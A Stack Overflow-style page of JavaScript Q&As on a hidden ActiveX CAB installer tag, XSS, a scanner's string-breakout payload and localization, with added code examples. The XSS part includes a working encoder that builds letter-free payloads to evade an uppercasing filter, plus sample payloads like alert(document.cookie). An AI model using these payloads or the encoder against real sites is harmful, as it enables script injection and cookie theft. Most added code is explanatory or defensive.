Please explain to me what this JavaScript code does - javascript

I have a JavaScript file with the following code:
caburl="http://"+top.window.location.host+"/ims.cab";
cabver="1,1,1,5";
document.write("<object id='IMS' width=0 height=0 classid='CLSID:8246AC2B-4733-4964-A744-4BE60C6731D4' codebase='"+caburl+"#version="+cabver+"' style='display:none'></object>");
From the above lines, I can understand that the first line specifies the location of the cab file. The second line specifies the cab file version.
Can anyone please explain to me what the third line does, the one that starts with document.write?
I don't have any knowledge of JavaScript and want to convert the task performed by this JavaScript into my EXE file.
Expecting a quick and positive response.

The third line writes the generated string value to the page (concatenating strings with the values of the caburl and cabver variables).
This adds an object element to the page with the values in the string.
From the classid value and the use of "cab" in the variable names, I would deduce this is an ActiveX component (so it would only work in IE). This is normally used for installing the component on the client computer.

It joins a string together to make an html tag, and then using document.write appends it to the HTML document.

The third line writes the string enclosed inside the write() function into the document being displayed in the browser.
Note that because of the style='display:none' text in the string, the <object> won't be visible in the browser.

The code will install a Java CAB file called "ims.cab" hosted on some server. See this question as well for reference: extract cab file and execute the exe file (inside the cab file) automatically
To do this with EXE of your own, you can take a look here: http://www.codeproject.com/KB/files/CABCompressExtract.aspx
Let us know what language you intend to use (C++, C# etc) for further help.

Related

Exploit an XSS when injected Javascript code is returned capitalized

I have found an XSS vulnerability in a piece of code, as I'm able to inject Javascript code in it.
I want to generate the simple alert PoC, but I'm not able to do so as the JS code returned by the server is always capitalized. For example, when I inject the following code:
Text sample <script>alert(document.cookie)</script>
The server responds with the page containing the following:
Text sample <script>ALERT(DOCUMENT.COOKIE)</script>
Which obviously does not print the cookie as JS is case sensitive.
Is there a way to transform the code injected in lowercase before it gets rendered or a similar solution?
Note: Javascript is enabled and if I modify manually the code in the browser console transforming it in lowercase, I'm getting the cookie printed.
No, you do not have control over the transformation and you cannot somehow change it back to lowercase before execution.
However, you can inject JavaScript code which is not affected by the capitalisation of the characters. See jsfuck, which doesn't need alphanumeric source characters at all, and use a similar approach (you can actually use digits and some characters).
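The approach the answer points at, as an added example that is not part of the original thread: a small JSFuck-style encoder that rebuilds every letter from the string forms of `false`, `true`, `undefined` and `[].filter`, and leaves digits, quotes and punctuation as ordinary string literals, since `toUpperCase()` does not change them. The only assumption is V8's `toString()` format for native functions (`function filter() { [native code] }`), which the letters `c` and `o` are indexed from; it holds in Node.js and Chromium-based browsers. `runUppercased` applies the same transformation the server in the question applies and then evaluates the result.

```javascript
// Added example: a letter-free JavaScript payload that survives .toUpperCase().
// Letters are reconstructed JSFuck-style; non-letters are emitted as plain
// string literals because uppercasing does not touch them.
// Assumption: V8's native-function toString() is "function filter() { [native code] }".

const FALSE = "(![]+[])";             // -> "false"
const TRUE = "(!![]+[])";             // -> "true"
const UNDEF = "([][[]]+[])";          // -> "undefined"
const FALSE_UNDEF = "([![]]+[][[]])"; // -> "falseundefined" (array + undefined concatenates)

// A numeric index written only with [ ] ! + : 0 -> +[], 1 -> +!![], 3 -> !![]+!![]+!![].
// Multi-digit indexes are built as a string, e.g. 10 -> [+!![]]+[+[]] === "10".
function num(n) {
  if (n === 0) return "+[]";
  if (n === 1) return "+!![]";
  if (n < 10) return Array(n).fill("!![]").join("+");
  return String(n).split("").map((d) => "[" + num(Number(d)) + "]").join("+");
}

const at = (expr, i) => expr + "[" + num(i) + "]";

const LETTERS = {
  f: at(FALSE, 0), a: at(FALSE, 1), l: at(FALSE, 2), s: at(FALSE, 3), e: at(FALSE, 4),
  t: at(TRUE, 0), r: at(TRUE, 1), u: at(TRUE, 2),
  n: at(UNDEF, 1), d: at(UNDEF, 2),
  i: at(FALSE_UNDEF, 10),
};

// Encode a string: letters come from LETTERS, runs of other printable ASCII are
// emitted as one JSON string literal (letter-free, so uppercasing leaves it alone).
function encode(s) {
  const parts = [];
  let literal = "";
  const flush = () => { if (literal) { parts.push(JSON.stringify(literal)); literal = ""; } };
  for (const ch of s) {
    if (LETTERS[ch]) { flush(); parts.push(LETTERS[ch]); }
    else if (/[A-Za-z]/.test(ch) || ch < " " || ch > "~") {
      // control chars would JSON-escape as \n etc., whose letter would get uppercased
      throw new Error("no letter-free form known for " + JSON.stringify(ch));
    } else literal += ch;
  }
  flush();
  return parts.join("+");
}

// [][ "filter" ] is Array.prototype.filter; its toString() supplies c and o.
const FILTER = "[][" + encode("filter") + "]";
LETTERS.c = at("(" + FILTER + "+[])", 3);     // "function filter() { ... }"[3]
LETTERS.o = at("(!![]+" + FILTER + ")", 10);  // "truefunction filter() ..."[10]

// Function(body)() reached through [].filter.constructor, with no letters anywhere.
function buildPayload(body) {
  return FILTER + "[" + encode("constructor") + "](" + encode(body) + ")()";
}

const hasLetters = (code) => /[A-Za-z]/.test(code);

// Simulate the server's transform, then run what the victim's browser would run.
function runUppercased(body) {
  const payload = buildPayload(body).toUpperCase();
  return eval(payload);
}

const demo = buildPayload("alert(1)");
console.log(demo.length + " chars, contains letters: " + hasLetters(demo));
console.log(runUppercased("return 6*7")); // 42 in Node, where alert() does not exist
```

The payload for `alert(1)` is a few hundred bytes, which matters only if the injection point has a length limit; the same construction works for any body whose letters are in the table, and the table can be extended from any other string the engine will coerce for you.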

Why is this masked JS code in a GET parameter: '*alert(13)*' executed on my page?

We had a WhiteHat scan done of our site, and one of the vulnerabilites they returned was our URL appended with whscheck'*alert(13)*'a/. When we run the full URL (https://oursite.com/phorders3/index.php/whscheck'*alert(13)*'a/), the site loads and an alert with the value of 13 pops. Can anyone explain how this works? What exactly are the asterisks and the a/ doing?
The code in your page is using the value from the URL in a string literal in the Javascript, without escaping the value properly. That means that anyone can just put Javascript in the URL and it will execute in the page.
That could for example be used for cross site scripting by linking to your site with such an URL, and when someone uses the link the script will run in their browser, pick up some information that is private to that user and send it somewhere.
The apostrophes and the asterisks are used to break out of a string literal. If you have some code like this in the Javascript in the page:
var s = '<? echo $variable ?>';
where the variable contains the value from the URL, it would end up like this in the rendered page:
var s = 'whscheck'*alert(13)*'a';
The apostrophe makes the string literal end, and makes the following expression a part of the Javascript code instead of content in a string.
The asterisk is just an operator between the expressions. It's easier to put in a URL than the + operator that would otherwise be a natural choice.
More than likely this injection is landing somewhere between <script> tags and the URL is being reflected in some sort of function or variable inside the script. Here is a breakdown of the injection and how/why it works.
' breaks out of the string literal in the variable definition
* causes the javascript to focus on that portion of code first and is often a way of getting around filters that disallow ;
alert(13) is the proof of concept that causes the alert box with 13 inside to show execution of javascript
* again is more than likely to bypass a filter or WAF blocking ;
' to re-open the string literal to make the syntax of the javascript correct
a is just some arbitrary input to go into the string
/ is to close off the path of the URL itself in what appears to be a RESTful URL structure.
There is an option in the Sentinel interface for you to ask the Whitehat engineers these kinds of questions directly, which is a very helpful resource.
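The string-literal breakout both answers describe, as an added example that is not part of the original thread: the server-side template is reduced to a JavaScript function so the vulnerable rendering and a hardened one can be executed side by side, with `alert()` replaced by a counter. The segment is the one from the scan; `renderVulnerable`, `renderSafe`, `jsStringLiteral` and `execute` are names introduced here.

```javascript
// Added example: raw interpolation into a JS string literal versus a properly
// encoded literal, run under an instrumented alert() so the effect is measurable.

const INJECTED = "whscheck'*alert(13)*'a";

// Vulnerable: the equivalent of  var s = '<? echo $variable ?>';
function renderVulnerable(value) {
  return "var s = '" + value + "';";
}

// Hardened: JSON-encode the value (quotes and backslashes escaped), then also
// escape < > and the line terminators U+2028/U+2029, so the value can neither
// end the string literal nor close the surrounding <script> element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}
function renderSafe(value) {
  return "var s = " + jsStringLiteral(value) + ";";
}

// Execute the rendered script the way a browser would, recording alert() calls
// and returning the value that ended up in s.
function execute(script) {
  const calls = [];
  const alert = (x) => { calls.push(x); return 1; };
  const s = new Function("alert", script + "\nreturn s;")(alert);
  return { alertCalls: calls, s };
}

const vuln = execute(renderVulnerable(INJECTED));
const safe = execute(renderSafe(INJECTED));
console.log("vulnerable:", vuln); // alertCalls: [13], s: NaN ('whscheck' * 1 * 'a')
console.log("safe:", safe);       // alertCalls: [],   s: the raw segment, as data
```

In PHP the equivalent of `jsStringLiteral` is `json_encode($variable, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)`, emitted without surrounding quotes of your own. Note that the vulnerable version does not even need the `*` trick: once the quote is out, any expression works, which is why encoding the value rather than filtering operators is the fix.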

How to apply a localization to a javascript string

I assigned a string to a JavaScript string object, like this:
var word = "Please input correct verb"
I want this string be in control by resource file in asp.net project. Does it provide the function to replace the string using a ASP.NET syntax to switch languages?
<%$ Resources:Registration, correctverb%>
Thanks.
There are various i18n projects for JavaScript, e.g. http://i18next.com/
If you have ResX files in your ASP project and you want them as JavaScript or JSON files you can convert them here; or via the REST API you could convert a resource file as follows:
$ curl --data-binary @messages.resx \
http://localise.biz/api/convert/resx/messages.json
(example in cURL, which I guess you may not have if you're on Windows)
A common approach for this is creating an HTTP handler that evaluates requests for say files with the extension *.js.axd (or whatever extension you come up with) and then parse the javascript file by replacing defined tokens with the actual localized resource value.
It may be costly only the first time the file is requested but then everything should run smoothly if caching is applied. Here's an example of how to create a handler, parsing the file should be trivial. You could use the same syntax to define localized strings on your file: <% LocalizedResourceName %>

check error in javascript included file and work around

For a select box on our website, we have changed the AJAX call that used to fill the city select box options to a JavaScript array file. The options are now filled from this file, which contains only a JS array.
This JS-only array file is created dynamically on some other server and transferred to a static server. Most of the time it works fine, but occasionally it fails and the file is corrupted or not fully transferred. In that case the file contents look like
var cityArray = [{SID : "15",SN : "Rajasthan",cities : [{CID : "677",CN : "Jaipur"}, //syntax error, no eol
So, when we try to use this file, all js stop working.
My question here is how can i check that the included file contains errors and use the legacy method to fill the select box options?
Thanks in advance.
I'd cheat a little:
Use a XMLHttpRequest to fetch a copy of the file as a string instead of adding a <script> tag.
Check if the string has an EOL, if not - add one.
Eval() the string in a try-catch statement.
Not only should that let you use your particular type of 'broken' files, but your script won't fall over if it's broken in other ways.
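The answer's approach, as an added example that is not part of the original thread: the file body is compiled inside a `Function` in a try/catch instead of being added as a `<script>` tag, its shape is checked, and the legacy loader is used if anything fails. The two file bodies are constructed here from the snippet in the question (one completed, one truncated as shown); the fetch step is replaced by a string argument, and `loadCitiesLegacy` is a placeholder for the old AJAX path.

```javascript
// Added example: compile the generated array file defensively and fall back on error.

const GOOD_FILE =
  'var cityArray = [{SID : "15",SN : "Rajasthan",cities : [{CID : "677",CN : "Jaipur"}]}];';
const TRUNCATED_FILE =
  'var cityArray = [{SID : "15",SN : "Rajasthan",cities : [{CID : "677",CN : "Jaipur"}, ';

// Structural check: every state has SID/SN and a cities array of CID/CN entries.
function isCityArray(v) {
  return Array.isArray(v) && v.every((st) =>
    st && typeof st.SID === "string" && typeof st.SN === "string" &&
    Array.isArray(st.cities) &&
    st.cities.every((c) => c && typeof c.CID === "string" && typeof c.CN === "string"));
}

// Compile the file in its own function scope so a syntax error becomes a
// catchable exception and nothing leaks into the global namespace. Returns the
// array or null. This still executes whatever the file contains, so the static
// host must be trusted exactly as much as it would be for a <script src>.
function parseCityArray(source) {
  try {
    const fn = new Function(source + "\n;return typeof cityArray === 'undefined' ? null : cityArray;");
    const result = fn();
    return isCityArray(result) ? result : null;
  } catch (e) {
    // SyntaxError for a truncated file, TypeError/ReferenceError for other junk
    return null;
  }
}

function loadCitiesLegacy() {
  // placeholder for the old AJAX request
  return [{ SID: "0", SN: "legacy", cities: [] }];
}

// Returns which source was used together with the data, so the caller can log
// fallbacks and spot a broken transfer instead of silently serving stale data.
function fillCities(fileText) {
  const parsed = parseCityArray(fileText);
  return parsed !== null
    ? { source: "file", data: parsed }
    : { source: "legacy", data: loadCitiesLegacy() };
}

console.log(fillCities(GOOD_FILE).source);      // "file"
console.log(fillCities(TRUNCATED_FILE).source); // "legacy"
```

In the browser the `fileText` argument comes from the XMLHttpRequest or `fetch()` response body; checking `response.ok` and, if the generator can emit one, a `Content-Length` or trailing sentinel comment, catches the partial-transfer case before compilation is even attempted.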

Using resource files (.resx) in javascript

I'm trying to use localization in my project but I can't find a way to access my resx files from JavaScript. I have been looking around a bit and I don't think the 'AJAX call' method would be ideal for my project since I have quite a lot of strings that need to be fetched and it would just hammer the server!
if I just put it in my HTML then it works with this code:
@using Resources
<p>@Html.Raw(ISt_Localization.January)</p>
I guess one of the things I could do is put all the strings in a hidden div and then get the content from the divs in my javascript but this wouldn't be very effective..
I had a similar situation and in my case, I created a separate partial view which only contained a javascript block where I put all the resource strings required for use in client side logic. Every resource string was defined as a javascript variable. You could also create an associative array.
In your partial view:
var Resources = {
January : "@Html.Raw(ISt_Localization.January)",
February : "@Html.Raw(ISt_Localization.February)",
...
};
You can also try the below thing directly
@using Resources
<script>
var value = '@Resource.January';
/* work with value
.......
.....
*/
</script>
I took a totally different approach.
I want to have the resource strings required by my Javascript files be part of my resx files.
Every key in my resource file which starts with js has to become available in Javascript.
In global.asax, in Application_OnStart I build Javascript files for all supported languages on the fly.
Because this only happens at the start of the application, it does not matter if it takes a few seconds.
Advantages:
All translations in one place (in the resx files which you use for your .NET application (C# or VB), but also for your JavaScript code)
Always up to date
Very fast, because we are going to use variables to get the translations
Building the Javascript file is easy.
Iterate through all key value pairs in all resx-files. Just pick out the keys starting with _js_.
Save the key value pair in the Javascript file.
So if the key value pair in the resx-file (languageSupport_es.resx) is '_js_Hello', 'Hola',
I write in my Javascript file (languageSupport_es.js) var Hello = 'Hola';
So alert(Hello) will give you 'Hola' if the current language is Spanish.
The only thing I now have to take care of is making sure the right 'language JavaScript file' is loaded before my other JavaScript files.
So if the language is Spanish, I ONLY include my 'Spanish language Javascript file' (languageSupport_es.js) first.
Easy, no? If somebody is interested, I can show some example code...
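The generation step the last answer describes, as an added example that is not part of the original thread: a Node.js script that extracts every `_js_`-prefixed entry from a .resx file and writes a JavaScript file. It deviates from the answer in two ways, both deliberate: the strings go into one `Resources` object per language rather than one global `var` per key, and every value passes through `JSON.stringify` with `<` escaped, so a translation containing quotes, backslashes or `</script>` cannot break out of the literal (the Razor snippets earlier in this thread place raw `Html.Raw` output between quotes, which has that problem). The resx content is constructed inline, and the regex parser only handles the plain `<data name="..."><value>...</value></data>` shape, not comments, `type` attributes or CDATA.

```javascript
// Added example: .resx -> language JavaScript file, with the values encoded as
// JS string literals rather than pasted raw.

const SAMPLE_RESX = `<?xml version="1.0" encoding="utf-8"?>
<root>
  <data name="Title" xml:space="preserve"><value>Registro</value></data>
  <data name="_js_Hello" xml:space="preserve">
    <value>Hola</value>
  </data>
  <data name="_js_Quote" xml:space="preserve"><value>Se dice "adiós" &lt;/script&gt;</value></data>
</root>`;

// Undo the XML entity encoding a resx editor applies; &amp; must be decoded last.
function decodeXml(s) {
  return s.replace(/&lt;/g, "<").replace(/&gt;/g, ">").replace(/&quot;/g, '"')
          .replace(/&apos;/g, "'").replace(/&amp;/g, "&");
}

// Returns { key: value } for every <data> whose name starts with prefix, prefix stripped.
function extractJsStrings(resxText, prefix) {
  const out = {};
  const re = /<data\s+name="([^"]+)"[^>]*>\s*<value>([\s\S]*?)<\/value>/g;
  let m;
  while ((m = re.exec(resxText)) !== null) {
    const [, name, raw] = m;
    if (!name.startsWith(prefix)) continue;
    out[name.slice(prefix.length)] = decodeXml(raw);
  }
  return out;
}

// Emit one object so keys cannot collide with other globals. JSON.stringify
// escapes quotes and backslashes; '<' is escaped as well so the file is also
// safe to inline inside a <script> block.
function buildLanguageJs(resxText, prefix = "_js_") {
  const strings = extractJsStrings(resxText, prefix);
  const body = Object.keys(strings).sort()
    .map((k) => "  " + JSON.stringify(k) + ": " +
                JSON.stringify(strings[k]).replace(/</g, "\\u003c"))
    .join(",\n");
  return "var Resources = {\n" + body + "\n};\n";
}

// Load the generated file the way a browser would and hand back the object.
function loadGenerated(js) {
  return new Function(js + "return Resources;")();
}

console.log(buildLanguageJs(SAMPLE_RESX));
// In Application_OnStart this would run once per languageSupport_xx.resx and
// write languageSupport_xx.js; the page then loads that file first and uses
// Resources.Hello instead of a bare Hello.
```

Serving the generated file with a far-future cache header and a content hash in its name keeps the "always up to date" property without re-downloading it on every page view.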
